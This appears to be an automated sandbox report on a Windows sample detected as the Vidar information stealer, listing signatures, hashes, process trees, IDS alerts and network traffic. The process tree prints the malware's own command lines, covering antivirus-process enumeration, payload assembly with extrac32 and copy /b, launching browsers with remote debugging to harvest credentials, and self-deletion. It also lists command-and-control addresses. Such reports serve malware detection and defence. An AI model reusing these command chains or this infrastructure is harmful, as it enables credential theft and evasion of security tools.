Edit tour

Windows Analysis Report
6684V5n83w.exe

Overview

General Information

Sample name:	6684V5n83w.exe renamed because original name is a hash value
Original sample name:	53c60d599aa498ed4efa79ba0b12e29f.exe
Analysis ID:	1582695
MD5:	53c60d599aa498ed4efa79ba0b12e29f
SHA1:	969a751e4c24b9e4487ff62908b230dd554a2acc
SHA256:	8dcce53ea838f3f97b8aff36e0a1ffd70aeb1de6b8c6e5d6b530499a07e59fce
Tags:	exeuser-abuse_ch
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

Monitors registry run keys for changes

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Uses 32bit PE files

Classification

Process Tree

System is w10x64

6684V5n83w.exe (PID: 5528 cmdline: "C:\Users\user\Desktop\6684V5n83w.exe" MD5: 53C60D599AA498ED4EFA79BA0B12E29F)

cmd.exe (PID: 4308 cmdline: "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2136 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7092 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3920 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4292 cmdline: cmd /c md 330775 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6156 cmdline: extrac32 /Y /E Modules MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3168 cmdline: findstr /V "however" Hotel MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4416 cmdline: cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 4984 cmdline: cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Evans.com (PID: 2656 cmdline: Evans.com l MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 1536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 1436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6472 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6380 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 3788 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

msedge.exe (PID: 6484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6308 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Evans.com l, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com, ParentProcessId: 2656, ParentProcessName: Evans.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 1536, ProcessName: chrome.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4308, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3920, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:46:09.022559+0100	2044247	1	Malware Command and Control Activity Detected	116.203.14.4	443	192.168.2.5	49993	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:46:10.344648+0100	2051831	1	Malware Command and Control Activity Detected	116.203.14.4	443	192.168.2.5	49995	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:46:10.344422+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49995	116.203.14.4	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:46:06.356202+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	49990	116.203.14.4	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 6684V5n83w.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Source: 6684V5n83w.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50135 version: TLS 1.2

Source: 6684V5n83w.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49990 -> 116.203.14.4:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49995 -> 116.203.14.4:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.14.4:443 -> 192.168.2.5:49995
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.14.4:443 -> 192.168.2.5:49993

Source: global traffic

HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 108.139.47.92 108.139.47.92
Source: Joe Sandbox View	IP Address: 20.110.205.119 20.110.205.119

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: global traffic	HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=137e5d88de79f0ec687e6aa1735634795; XID=137e5d88de79f0ec687e6aa1735634795
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=A917510D236B4283B5F86A7AAE2621DD&MUID=05F9EFDB33DC678B1BFFFABD3256667F HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1; SM=T

Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log7.23.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log7.23.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log7.23.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
